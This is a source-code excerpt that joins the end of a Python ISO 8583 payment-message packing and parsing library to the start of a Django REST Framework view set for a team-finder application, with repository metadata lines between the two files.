_BITS_VALUE_TYPE[117] = ['117', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[118] = ['118', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[119] = ['119', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[120] = ['120', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[121] = ['121', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[122] = ['122', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[123] = ['123', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[124] = ['124', 'Info Text', 'LLL', 255, 'ans']
_BITS_VALUE_TYPE[125] = ['125', 'Network management information', 'LL', 50, 'ans']
_BITS_VALUE_TYPE[126] = ['126', 'Issuer trace id', 'LL', 6, 'ans']
_BITS_VALUE_TYPE[127] = ['127', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[128] = ['128', 'Message authentication code (MAC) field', 'B', 16, 'b']
################################################################################################
# Default constructor of the ISO8583 Object
def __init__(self, iso="", debug=False):
"""Default Constructor of ISO8583 Package.
It inicialize a "brand new" ISO8583 package
Example: To Enable debug you can use:
pack = ISO8583(debug=True)
@param: iso a String that represents the ASCII of the package. The same that you need to pass to setIsoContent() method.
@param: debug (True or False) default False -> Used to print some debug infos. Only use if want that messages!
"""
# Bitmap internal representation
self.BITMAP = []
# Values
self.BITMAP_VALUES = []
# Bitmap ASCII representantion
self.BITMAP_HEX = ''
# MTI
self.MESSAGE_TYPE_INDICATION = '';
# Debug ?
self.DEBUG = debug
self.__inicializeBitmap()
self.__inicializeBitmapValues()
if iso != "":
self.setIsoContent(iso)
################################################################################################
################################################################################################
# Return bit type
def getBitType(self, bit):
"""Method that return the bit Type
@param: bit -> Bit that will be searched and whose type will be returned
@return: str that represents the type of the bit
"""
return self._BITS_VALUE_TYPE[bit][2]
################################################################################################
################################################################################################
# Return bit limit
def getBitLimit(self, bit):
"""Method that return the bit limit (Max size)
@param: bit -> Bit that will be searched and whose limit will be returned
@return: int that indicate the limit of the bit
"""
return self._BITS_VALUE_TYPE[bit][3]
################################################################################################
################################################################################################
# Return bit value type
def getBitValueType(self, bit):
"""Method that return the bit value type
@param: bit -> Bit that will be searched and whose value type will be returned
@return: str that indicate the valuye type of the bit
"""
return self._BITS_VALUE_TYPE[bit][4]
################################################################################################
################################################################################################
# Return large bit name
def getLargeBitName(self, bit):
"""Method that return the large bit name
@param: bit -> Bit that will be searched and whose name will be returned
@return: str that represents the name of the bit
"""
return self._BITS_VALUE_TYPE[bit][1]
################################################################################################
################################################################################################
# Set the MTI
def setTransationType(self, type):
"""Method that set Transation Type (MTI)
@param: type -> MTI to be setted
@raise: ValueToLarge Exception
"""
type = "%s" % type
if len(type) > 4:
type = type[0:3]
raise ValueToLarge('Error: value up to size! MTI limit size = 4')
typeT = "";
if len(type) < 4:
for cont in range(len(type), 4):
typeT += "0"
self.MESSAGE_TYPE_INDICATION = "%s%s" % (typeT, type)
################################################################################################
################################################################################################
# setMTI too
def setMTI(self, type):
"""Method that set Transation Type (MTI)
In fact, is an alias to "setTransationType" method
@param: type -> MTI to be setted
"""
self.setTransationType(type)
################################################################################################
################################################################################################
# Method that put "zeros" inside bitmap
def __inicializeBitmap(self):
"""Method that inicialize/reset a internal bitmap representation
It's a internal method, so don't call!
"""
if self.DEBUG == True:
print('Init bitmap')
if len(self.BITMAP) == 16:
for cont in range(0, 16):
self.BITMAP[cont] = self._BIT_DEFAULT_VALUE
else:
for cont in range(0, 16):
self.BITMAP.append(self._BIT_DEFAULT_VALUE)
################################################################################################
################################################################################################
# init with "0" the array of values
def __inicializeBitmapValues(self):
"""Method that inicialize/reset a internal array used to save bits and values
It's a internal method, so don't call!
"""
if self.DEBUG == True:
print('Init bitmap_values')
if len(self.BITMAP_VALUES) == 128:
for cont in range(0, 129):
self.BITMAP_VALUES[cont] = self._BIT_DEFAULT_VALUE
else:
for cont in range(0, 129):
self.BITMAP_VALUES.append(self._BIT_DEFAULT_VALUE)
################################################################################################
################################################################################################
# Set a value to a bit
def setBit(self, bit, value):
"""Method used to set a bit with a value.
It's one of the most important method to use when using this library
@param: bit -> bit number that want to be setted
@param: value -> the value of the bit
@return: True/False default True -> To be used in the future!
@raise: BitInexistent Exception, ValueToLarge Exception
"""
if self.DEBUG == True:
print('Setting bit inside bitmap bit[%s] = %s') % (bit, value)
if bit < 1 or bit > 128:
raise BitInexistent("Bit number %s dosen't exist!" % bit)
# caculate the position insede bitmap
pos = 1
if self.getBitType(bit) == 'LL':
self.__setBitTypeLL(bit, value)
if self.getBitType(bit) == 'LLL':
self.__setBitTypeLLL(bit, value)
if self.getBitType(bit) == 'N':
self.__setBitTypeN(bit, value)
if self.getBitType(bit) == 'A':
self.__setBitTypeA(bit, value)
if self.getBitType(bit) == 'ANS' or self.getBitType(bit) == 'B':
self.__setBitTypeANS(bit, value)
if self.getBitType(bit) == 'B':
self.__setBitTypeB(bit, value)
# Continuation bit?
if bit > 64:
self.BITMAP[0] = self.BITMAP[0] | self._TMP[2] # need to set bit 1 of first "bit" in bitmap
if (bit % 8) == 0:
pos = (bit / 8) - 1
else:
pos = (bit / 8)
# need to check if the value can be there .. AN , N ... etc ... and the size
self.BITMAP[pos] = self.BITMAP[pos] | self._TMP[(bit % 8) + 1]
return True
################################################################################################
################################################################################################
# print bitmap
def showBitmap(self):
"""Method that print the bitmap in ASCII form
Hint: Try to use getBitmap method and format your own print :)
"""
self.__buildBitmap()
# printing
print(self.BITMAP_HEX)
################################################################################################
################################################################################################
# Build a bitmap
def __buildBitmap(self):
"""Method that build the bitmap ASCII
It's a internal method, so don't call!
"""
self.BITMAP_HEX = ''
for c in range(0, 16):
if (self.BITMAP[0] & self._BIT_POSITION_1) != self._BIT_POSITION_1:
# Only has the first bitmap
if self.DEBUG == True:
print('%d Bitmap = %d(Decimal) = %s (hexa) ' % (c, self.BITMAP[c], hex(self.BITMAP[c])))
tm = hex(self.BITMAP[c])[2:]
if len(tm) != 2:
tm = '0' + tm
self.BITMAP_HEX += tm
if c == 7:
break
else: # second bitmap
if self.DEBUG == True:
print('%d Bitmap = %d(Decimal) = %s (hexa) ' % (c, self.BITMAP[c], hex(self.BITMAP[c])))
tm = hex(self.BITMAP[c])[2:]
if len(tm) != 2:
tm = '0' + tm
self.BITMAP_HEX += tm
################################################################################################
################################################################################################
# Get a bitmap from str
def __getBitmapFromStr(self, bitmap):
"""Method that receive a bitmap str and transfor it to ISO8583 object readable.
@param: bitmap -> bitmap str to be readable
It's a internal method, so don't call!
"""
# Need to check if the size is correct etc...
cont = 0
if self.BITMAP_HEX != '':
self.BITMAP_HEX = ''
for x in range(0, 32, 2):
if (int(bitmap[0:2], 16) & self._BIT_POSITION_1) != self._BIT_POSITION_1: # Only 1 bitmap
if self.DEBUG == True:
print('Token[%d] %s converted to int is = %s' % (x, bitmap[x:x + 2], int(bitmap[x:x + 2], 16)))
self.BITMAP_HEX += bitmap[x:x + 2]
self.BITMAP[cont] = int(bitmap[x:x + 2], 16)
if x == 14:
break
else: # Second bitmap
if self.DEBUG == True:
print('Token[%d] %s converted to int is = %s' % (x, bitmap[x:x + 2], int(bitmap[x:x + 2], 16)))
self.BITMAP_HEX += bitmap[x:x + 2]
self.BITMAP[cont] = int(bitmap[x:x + 2], 16)
cont += 1
################################################################################################
################################################################################################
# print bit array that is present in the bitmap
def showBitsFromBitmapStr(self, bitmap):
"""Method that receive a bitmap str, process it, and print a array with bits this bitmap string represents.
Usualy is used to debug things.
@param: bitmap -> bitmap str to be analized and translated to "bits"
"""
bits = self.__inicializeBitsFromBitmapStr(bitmap)
print('Bits inside %s = %s' % (bitmap, bits))
################################################################################################
################################################################################################
# inicialize a bitmap using ASCII str
def __inicializeBitsFromBitmapStr(self, bitmap):
"""Method that receive a bitmap str, process it, and prepare ISO8583 object to understand and "see" the bits and values inside the ISO ASCII package.
It's a internal method, so don't call!
@param: bitmap -> bitmap str to be analized and translated to "bits"
"""
bits = []
for c in range(0, 16):
for d in range(1, 9):
if self.DEBUG == True:
print('Value (%d)-> %s & %s = %s' % (
d, self.BITMAP[c], self._TMP[d], (self.BITMAP[c] & self._TMP[d])))
if (self.BITMAP[c] & self._TMP[d]) == self._TMP[d]:
if d == 1: # e o 8 bit
if self.DEBUG == True:
print('Bit %s is present !!!' % ((c + 1) * 8))
bits.append((c + 1) * 8)
self.BITMAP_VALUES[(c + 1) * 8] = 'X'
else:
if (c == 0) & (d == 2): # Continuation bit
if self.DEBUG == True:
print('Bit 1 is present !!!')
bits.append(1)
else:
if self.DEBUG == True:
print('Bit %s is present !!!' % (c * 8 + d - 1))
bits.append(c * 8 + d - 1)
self.BITMAP_VALUES[c * 8 + d - 1] = 'X'
bits.sort()
return bits
################################################################################################
################################################################################################
# return a array of bits, when processing the bitmap
def __getBitsFromBitmap(self):
"""Method that process the bitmap and return a array with the bits presents inside it.
It's a internal method, so don't call!
"""
bits = []
for c in range(0, 16):
for d in range(1, 9):
if self.DEBUG == True:
print('Value (%d)-> %s & %s = %s' % (
d, self.BITMAP[c], self._TMP[d], (self.BITMAP[c] & self._TMP[d])))
if (self.BITMAP[c] & self._TMP[d]) == self._TMP[d]:
if d == 1: # e o 8 bit
if self.DEBUG == True:
print('Bit %s is present !!!' % ((c + 1) * 8))
bits.append((c + 1) * 8)
else:
if (c == 0) & (d == 2): # Continuation bit
if self.DEBUG == True:
print('Bit 1 is present !!!')
bits.append(1)
else:
if self.DEBUG == True:
print('Bit %s is present !!!' % (c * 8 + d - 1))
bits.append(c * 8 + d - 1)
bits.sort()
return bits
################################################################################################
################################################################################################
# Set of type LL
def __setBitTypeLL(self, bit, value):
"""Method that set a bit with value in form LL
It put the size in front of the value
Example: pack.setBit(99,'123') -> Bit 99 is a LL type, so this bit, in ASCII form need to be 03123. To understand, 03 is the size of the information and 123 is the information/value
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > 99:
# value = value[0:99]
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
if len(value) > self.getBitLimit(bit):
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
size = "%s" % len(value)
self.BITMAP_VALUES[bit] = "%s%s" % (size.zfill(2), value)
################################################################################################
################################################################################################
# Set of type LLL
def __setBitTypeLLL(self, bit, value):
"""Method that set a bit with value in form LLL
It put the size in front of the value
Example: pack.setBit(104,'12345ABCD67890') -> Bit 104 is a LLL type, so this bit, in ASCII form need to be 01412345ABCD67890.
To understand, 014 is the size of the information and 12345ABCD67890 is the information/value
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > 999:
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
if len(value) > self.getBitLimit(bit):
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
size = "%s" % len(value)
self.BITMAP_VALUES[bit] = "%s%s" % (size.zfill(3), value)
################################################################################################
################################################################################################
# Set of type N,
def __setBitTypeN(self, bit, value):
"""Method that set a bit with value in form N
It complete the size of the bit with a default value
Example: pack.setBit(3,'30000') -> Bit 3 is a N type, so this bit, in ASCII form need to has size = 6 (ISO especification) so the value 30000 size = 5 need to receive more "1" number.
In this case, will be "0" in the left. In the package, the bit will be sent like '030000'
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > self.getBitLimit(bit):
value = value[0:self.getBitLimit(bit)]
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
self.BITMAP_VALUES[bit] = value.zfill(self.getBitLimit(bit))
################################################################################################
################################################################################################
# Set of type A
def __setBitTypeA(self, bit, value):
"""Method that set a bit with value in form A
It complete the size of the bit with a default value
Example: pack.setBit(3,'30000') -> Bit 3 is a A type, so this bit, in ASCII form need to has size = 6 (ISO especification) so the value 30000 size = 5 need to receive more "1" number.
In this case, will be "0" in the left. In the package, the bit will be sent like '030000'
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > self.getBitLimit(bit):
value = value[0:self.getBitLimit(bit)]
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
self.BITMAP_VALUES[bit] = value.zfill(self.getBitLimit(bit))
################################################################################################
################################################################################################
# Set of type B
def __setBitTypeB(self, bit, value):
"""Method that set a bit with value in form B
It complete the size of the bit with a default value
Example: pack.setBit(3,'30000') -> Bit 3 is a B type, so this bit, in ASCII form need to has size = 6 (ISO especification) so the value 30000 size = 5 need to receive more "1" number.
In this case, will be "0" in the left. In the package, the bit will be sent like '030000'
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > self.getBitLimit(bit):
value = value[0:self.getBitLimit(bit)]
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
self.BITMAP_VALUES[bit] = value.zfill(self.getBitLimit(bit))
################################################################################################
################################################################################################
# Set of type ANS
def __setBitTypeANS(self, bit, value):
"""Method that set a bit with value in form ANS
It complete the size of the bit with a default value
Example: pack.setBit(3,'30000') -> Bit 3 is a ANS type, so this bit, in ASCII form need to has size = 6 (ISO especification) so the value 30000 size = 5 need to receive more "1" number.
In this case, will be "0" in the left. In the package, the bit will be sent like '030000'
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > self.getBitLimit(bit):
value = value[0:self.getBitLimit(bit)]
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
self.BITMAP_VALUES[bit] = value.zfill(self.getBitLimit(bit))
################################################################################################
################################################################################################
# print os bits insede iso
def showIsoBits(self):
"""Method that show in detail a list of bits , values and types inside the object
Example: output to
(...)
iso.setBit(2,2)
iso.setBit(4,4)
(...)
iso.showIsoBits()
(...)
Bit[2] of type LL has limit 19 = 012
Bit[4] of type N has limit 12 = 000000000004
(...)
"""
for cont in range(0, 129):
if self.BITMAP_VALUES[cont] != self._BIT_DEFAULT_VALUE:
print("Bit[%s] of type %s has limit %s = %s" % (
cont, self.getBitType(cont), self.getBitLimit(cont), self.BITMAP_VALUES[cont]))
################################################################################################
################################################################################################
# print Raw iso
def showRawIso(self):
"""Method that print ISO8583 ASCII complete representation
Example:
iso = ISO8583()
iso.setMTI('0800')
iso.setBit(2,2)
iso.setBit(4,4)
iso.setBit(12,12)
iso.setBit(17,17)
iso.setBit(99,99)
iso.showRawIso()
output (print) -> 0800d010800000000000000000002000000001200000000000400001200170299
Hint: Try to use getRawIso method and format your own print :)
"""
resp = self.getRawIso()
print(resp)
################################################################################################
################################################################################################
# Return raw iso
def getRawIso(self):
"""Method that return ISO8583 ASCII complete representation
Example:
iso = ISO8583()
iso.setMTI('0800')
iso.setBit(2,2)
iso.setBit(4,4)
iso.setBit(12,12)
iso.setBit(17,17)
iso.setBit(99,99)
str = iso.getRawIso()
print ('This is the ASCII package %s' % str)
output (print) -> This is the ASCII package 0800d010800000000000000000002000000001200000000000400001200170299
@return: str with complete ASCII ISO8583
@raise: InvalidMTI Exception
"""
self.__buildBitmap()
if self.MESSAGE_TYPE_INDICATION == '':
raise InvalidMTI('Check MTI! Do you set it?')
resp = "";
resp += self.MESSAGE_TYPE_INDICATION
resp += self.BITMAP_HEX
for cont in range(0, 129):
if self.BITMAP_VALUES[cont] != self._BIT_DEFAULT_VALUE:
resp = "%s%s" % (resp, self.BITMAP_VALUES[cont])
return resp
################################################################################################
################################################################################################
# Redefine a bit
def redefineBit(self, bit, smallStr, largeStr, bitType, size, valueType):
"""Method that redefine a bit structure in global scope!
Can be used to personalize ISO8583 structure to another specification (ISO8583 1987 for example!)
Hint: If you have a lot of "ValueToLarge Exception" maybe the especification that you are using is different of mine. So you will need to use this method :)
@param: bit -> bit to be redefined
@param: smallStr -> a small String representantion of the bit, used to build "user friendly prints", example "2" for bit 2
@param: largeStr -> a large String representantion of the bit, used to build "user friendly prints" and to be used to inform the "main use of the bit",
example "Primary account number (PAN)" for bit 2
@param: bitType -> type the bit, used to build the values, example "LL" for bit 2. Need to be one of (B, N, AN, ANS, LL, LLL)
@param: size -> limit size the bit, used to build/complete the values, example "19" for bit 2.
@param: valueType -> value type the bit, used to "validate" the values, example "n" for bit 2. This mean that in bit 2 we need to have only numeric values.
Need to be one of (a, an, n, ansb, b)
@raise: BitInexistent Exception, InvalidValueType Exception
"""
if self.DEBUG == True:
print('Trying to redefine the bit with (self,%s,%s,%s,%s,%s,%s)' % (
bit, smallStr, largeStr, bitType, size, valueType))
# validating bit position
if bit == 1 or bit == 64 or bit < 0 or bit > 128:
raise BitInexistent("Error %d cannot be changed because has a invalid number!" % bit)
# need to validate if the type and size is compatible! example slimit = 100 and type = LL
if bitType == "B" or bitType == "N" or bitType == "AN" or bitType == "ANS" or bitType == "LL" or bitType == "LLL":
if valueType == "a" or valueType == "n" or valueType == "ansb" or valueType == "ans" or valueType == "b" or valueType == "an":
self._BITS_VALUE_TYPE[bit] = [smallStr, largeStr, bitType, size, valueType]
if self.DEBUG == True:
print('Bit %d redefined!' % bit)
else:
raise InvalidValueType(
"Error bit %d cannot be changed because %s is not a valid valueType (a, an, n ansb, b)!" % (
bit, valueType))
# return
else:
raise InvalidBitType(
"Error bit %d cannot be changed because %s is not a valid bitType (Hex, N, AN, ANS, LL, LLL)!" % (
bit, bitType))
# return
################################################################################################
################################################################################################
# a partir de um trem de string, pega o MTI
def __setMTIFromStr(self, iso):
"""Method that get the first 4 characters to be the MTI.
It's a internal method, so don't call!
"""
self.MESSAGE_TYPE_INDICATION = iso[0:4]
if self.DEBUG == True:
print('MTI found was %s' % self.MESSAGE_TYPE_INDICATION)
################################################################################################
################################################################################################
# return the MTI
def getMTI(self):
"""Method that return the MTI of the package
@return: str -> with the MTI
"""
# Need to validate if the MTI was setted ...etc ...
return self.MESSAGE_TYPE_INDICATION
################################################################################################
################################################################################################
# Return the bitmap
def getBitmap(self):
"""Method that return the ASCII Bitmap of the package
@return: str -> with the ASCII Bitmap
"""
if self.BITMAP_HEX == '':
self.__buildBitmap()
return self.BITMAP_HEX
################################################################################################
################################################################################################
# return the Varray of values
def getValuesArray(self):
"""Method that return an internal array of the package
@return: array -> with all bits, presents or not in the bitmap
"""
return self.BITMAP_VALUES
################################################################################################
################################################################################################
# Receive a str and interpret it to bits and values
def __getBitFromStr(self, strWithoutMtiBitmap):
"""Method that receive a string (ASCII) without MTI and Bitmaps (first and second), understand it and remove the bits values
@param: str -> with all bits presents whithout MTI and bitmap
It's a internal method, so don't call!
"""
if self.DEBUG == True:
print('This is the input string <%s>' % strWithoutMtiBitmap)
offset = 0;
# jump bit 1 because it was alread defined in the "__inicializeBitsFromBitmapStr"
for cont in range(2, 129):
if self.BITMAP_VALUES[cont] != self._BIT_DEFAULT_VALUE:
if self.DEBUG == True:
print('String = %s offset = %s bit = %s' % (strWithoutMtiBitmap[offset:], offset, cont))
if self.getBitType(cont) == 'LL':
valueSize = int(strWithoutMtiBitmap[offset:offset + 2])
if self.DEBUG == True:
print('Size of the message in LL = %s' % valueSize)
if valueSize > self.getBitLimit(cont):
print('This bit is larger thant the specification.')
# raise ValueToLarge("This bit is larger than the especification!")
self.BITMAP_VALUES[cont] = strWithoutMtiBitmap[offset:offset + 2] + strWithoutMtiBitmap[
offset + 2:offset + 2 + valueSize]
if self.DEBUG == True:
print('\tSetting bit %s value %s' % (cont, self.BITMAP_VALUES[cont]))
# fix for AppZone - their responses don't comply with specifications
if cont == 33:
offset += valueSize + 2 # replace with 17 if it fails
else:
offset += valueSize + 2
if self.getBitType(cont) == 'LLL':
valueSize = int(strWithoutMtiBitmap[offset:offset + 3])
if self.DEBUG == True:
print('Size of the message in LLL = %s' % valueSize)
if valueSize > self.getBitLimit(cont):
raise ValueToLarge("This bit is larger than the especification!")
self.BITMAP_VALUES[cont] = strWithoutMtiBitmap[offset:offset + 3] + strWithoutMtiBitmap[
offset + 3:offset + 3 + valueSize]
if self.DEBUG == True:
print('\tSetting bit %s value %s' % (cont, self.BITMAP_VALUES[cont]))
offset += valueSize + 3
# if self.getBitType(cont) == 'LLLL':
# valueSize = int(strWithoutMtiBitmap[offset:offset +4])
# if valueSize > self.getBitLimit(cont):
# raise ValueToLarge("This bit is larger than the especification!")
# self.BITMAP_VALUES[cont] = '(' + strWithoutMtiBitmap[offset:offset+4] + ')' + strWithoutMtiBitmap[offset+4:offset+4+valueSize]
# offset += valueSize + 4
if self.getBitType(cont) == 'N' or self.getBitType(cont) == 'A' or self.getBitType(
cont) == 'ANS' or self.getBitType(cont) == 'B' or self.getBitType(cont) == 'AN':
self.BITMAP_VALUES[cont] = strWithoutMtiBitmap[offset:self.getBitLimit(cont) + offset]
if self.DEBUG == True:
print('\tSetting bit %s value %s' % (cont, self.BITMAP_VALUES[cont]))
offset += self.getBitLimit(cont)
################################################################################################
################################################################################################
# Parse a ASCII iso to object
def setIsoContent(self, iso):
"""Method that receive a complete ISO8583 string (ASCII) understand it and remove the bits values
Example:
iso = '0210B238000102C080040000000000000002100000000000001700010814465469421614465701081100301000000N399915444303500019991544986020 Value not allowed009000095492'
i2 = ISO8583()
# in this case, we need to redefine a bit because default bit 42 is LL and in this especification is "N"
# the rest remain, so we use "get" :)
i2.redefineBit(42, '42', i2.getLargeBitName(42), 'N', i2.getBitLimit(42), i2.getBitValueType(42) )
i2.setIsoContent(iso2)
print ('Bitmap = %s' %i2.getBitmap())
print ('MTI = %s' %i2.getMTI() )
print ('This ISO has bits:')
v3 = i2.getBitsAndValues()
for v in v3:
print ('Bit %s of type %s with value = %s' % (v['bit'],v['type'],v['value']))
@param: str -> complete ISO8583 string
@raise: InvalidIso8583 Exception
"""
if len(iso) < 20:
raise InvalidIso8583('This is not a valid iso!!')
if self.DEBUG == True:
print('ASCII to process <%s>' % iso)
self.__setMTIFromStr(iso)
isoT = iso[4:]
self.__getBitmapFromStr(isoT)
self.__inicializeBitsFromBitmapStr(self.BITMAP_HEX)
if self.DEBUG == True:
print('This is the array of bits (before) %s ' % self.BITMAP_VALUES)
self.__getBitFromStr(iso[4 + len(self.BITMAP_HEX):])
if self.DEBUG == True:
print('This is the array of bits (after) %s ' % self.BITMAP_VALUES)
################################################################################################
################################################################################################
# Method that compare 2 isos
def __cmp__(self, obj2):
"""Method that compare two objects in "==", "!=" and other things
Example:
p1 = ISO8583()
p1.setMTI('0800')
p1.setBit(2,2)
p1.setBit(4,4)
p1.setBit(12,12)
p1.setBit(17,17)
p1.setBit(99,99)
#get the rawIso and save in the iso variable
iso = p1.getRawIso()
p2 = ISO8583()
p2.setIsoContent(iso)
print ('Is equivalent?')
if p1 == p1:
print ('Yes :)')
else:
print ('Noooooooooo :(')
@param: obj2 -> object that will be compared
@return: <0 if is not equal, 0 if is equal
"""
ret = -1 # By default is different
if (self.getMTI() == obj2.getMTI()) and (self.getBitmap() == obj2.getBitmap()) and (
self.getValuesArray() == obj2.getValuesArray()):
ret = 0
return ret
################################################################################################
################################################################################################
# Method that return a array with bits and values inside the iso package
def getBitsAndValues(self):
"""Method that return an array of bits, values, types etc.
Each array value is a dictionary with: {'bit':X ,'type': Y, 'value': Z} Where:
bit: is the bit number
type: is the bit type
value: is the bit value inside this object
so the Generic array returned is: [ (...),{'bit':X,'type': Y, 'value': Z}, (...)]
Example:
p1 = ISO8583()
p1.setMTI('0800')
p1.setBit(2,2)
p1.setBit(4,4)
p1.setBit(12,12)
p1.setBit(17,17)
p1.setBit(99,99)
v1 = p1.getBitsAndValues()
for v in v1:
print ('Bit %s of type %s with value = %s' % (v['bit'],v['type'],v['value']))
@return: array of values.
"""
ret = []
for cont in range(2, 129):
if self.BITMAP_VALUES[cont] != self._BIT_DEFAULT_VALUE:
_TMP = {}
_TMP['bit'] = "%d" % cont
_TMP['type'] = self.getBitType(cont)
_TMP['value'] = self.BITMAP_VALUES[cont]
ret.append(_TMP)
return ret
################################################################################################
################################################################################################
# Method that return a array with bits and values inside the iso package
def getBit(self, bit):
"""Return the value of the bit
@param: bit -> the number of the bit that you want the value
@raise: BitInexistent Exception, BitNotSet Exception
"""
if bit < 1 or bit > 128:
raise BitInexistent("Bit number %s dosen't exist!" % bit)
# Is that bit set?
isThere = False
arr = self.__getBitsFromBitmap()
if self.DEBUG == True:
print('This is the array of bits inside the bitmap %s' % arr)
for v in arr:
if v == bit:
value = self.BITMAP_VALUES[bit]
isThere = True
break
if isThere:
return value
else:
raise BitNotSet("Bit number %s was not set!" % bit)
################################################################################################
################################################################################################
# Method that return ISO8583 to TCPIP network form, with the size in the beginning.
def getNetworkISO(self, bigEndian=True):
"""Method that return ISO8583 ASCII package with the size in the beginning
By default, it return the package with size represented with big-endian.
Is the same that:
import struct
(...)
iso = ISO8583()
iso.setBit(3,'300000')
(...)
ascii = iso.getRawIso()
# Example: big-endian
# To little-endian, replace '!h' with '<h'
netIso = struct.pack('!h',len(iso))
netIso += ascii
# Example: big-endian
# To little-endian, replace 'iso.getNetworkISO()' with 'iso.getNetworkISO(False)'
print ('This <%s> the same that <%s>' % (iso.getNetworkISO(),netIso))
@param: bigEndian (True|False) -> if you want that the size be represented in this way.
@return: size + ASCII ISO8583 package ready to go to the network!
@raise: InvalidMTI Exception
"""
netIso = ""
asciiIso = self.getRawIso()
if bigEndian:
netIso = struct.pack('!h', len(asciiIso))
if self.DEBUG == True:
print('Pack Big-endian')
else:
netIso = struct.pack('<h', len(asciiIso))
if self.DEBUG == True:
print('Pack Little-endian')
netIso += asciiIso
return netIso
################################################################################################
################################################################################################
# Method that recieve a ISO8583 ASCII package in the network form and parse it.
def setNetworkISO(self, iso, bigEndian=True):
"""Method that receive sie + ASCII ISO8583 package and transfor it in the ISO8583 object.
By default, it recieve the package with size represented with big-endian.
Is the same that:
import struct
(...)
iso = ISO8583()
iso.setBit(3,'300000')
(...)
# Example: big-endian
# To little-endian, replace 'iso.getNetworkISO()' with 'iso.getNetworkISO(False)'
netIso = iso.getNetworkISO()
newIso = ISO8583()
# Example: big-endian
# To little-endian, replace 'newIso.setNetworkISO()' with 'newIso.setNetworkISO(False)'
newIso.setNetworkISO(netIso)
#Is the same that:
#size = netIso[0:2]
## To little-endian, replace '!h' with '<h'
#size = struct.unpack('!h',size )
#newIso.setIsoContent(netIso[2:size])
arr = newIso.getBitsAndValues()
for v in arr:
print ('Bit %s Type %s Value = %s' % (v['bit'],v['type'],v['value']))
@param: iso -> str that represents size + ASCII ISO8583 package
@param: bigEndian (True|False) -> Codification of the size.
@raise: InvalidIso8583 Exception
"""
if len(iso) < 24:
raise InvalidIso8583('This is not a valid iso!!Invalid Size')
size = iso[0:2]
if bigEndian:
size = struct.unpack('!h', size)
if self.DEBUG == True:
print('Unpack Big-endian')
else:
size = struct.unpack('<h', size)
if self.DEBUG == True:
print('Unpack Little-endian')
if len(iso) != (size[0] + 2):
raise InvalidIso8583(
'This is not a valid iso!!The ISO8583 ASCII(%s) is less than the size %s!' % (len(iso[2:]), size[0]))
self.setIsoContent(iso[2:])
################################################################################################
|
gpl-3.0
| -8,084,716,628,131,540,000
| 45.057771
| 193
| 0.478809
| false
| 3.995553
| false
| false
| false
|
prattl/teamfinder
|
api/teams/api/views.py
|
1
|
6335
|
from common.api.permissions import IsStaffOrTeamCaptain
from common.models import Interest, Language, Position, TeamMember, Region
from teams.api.serializers import EditableFlatTeamSerializer, TeamSerializer, PlayerMembershipSerializer
from teams.models import Team
from rest_framework import permissions, status, viewsets
from rest_framework.decorators import detail_route
from rest_framework.response import Response
from .serializers import FlatTeamSerializer
class TeamViewSet(viewsets.ModelViewSet):
queryset = Team.objects.all()
serializer_class = TeamSerializer
model = Team
permission_classes = (IsStaffOrTeamCaptain, ) # TODO: Create IsStaffOrTeamCaptain permission for put/patch/delete
# TODO: Create IsStaffOrPlayer permission for post
@staticmethod
def setup_eager_loading(queryset):
queryset = queryset.select_related(
'captain',
'captain__user',
'creator',
'creator__user',
).prefetch_related(
'regions',
'available_positions',
'captain__regions',
'captain__positions',
'captain__teams',
'creator__regions',
'creator__positions',
'creator__teams',
'players__regions',
'teammember_set__player',
'teammember_set__player__user',
'teammember_set__player__regions',
'teammember_set__player__positions',
'teammember_set__player__teams',
)
return queryset
def get_serializer_class(self):
"""
If GET, HEAD, or OPTIONS return the nested serializer
If POST, PUT, PATCH, or DELETE return a flat serializer
Change the serializer based on permissions
* If method is safe, return TeamSerializer
* If user is the team captain, return EditableFlatTeamSerializer
* Else, return FlatTeamSerializer
"""
def _get_serializer_class():
if self.request.method in permissions.SAFE_METHODS:
return TeamSerializer
try:
instance = self.get_object()
except AssertionError:
pass
else:
if self.request.user == instance.captain.user:
return EditableFlatTeamSerializer
return FlatTeamSerializer
serializer_class = _get_serializer_class()
return serializer_class
def get_queryset_for_search(self, queryset):
keywords = self.request.query_params.get('keywords')
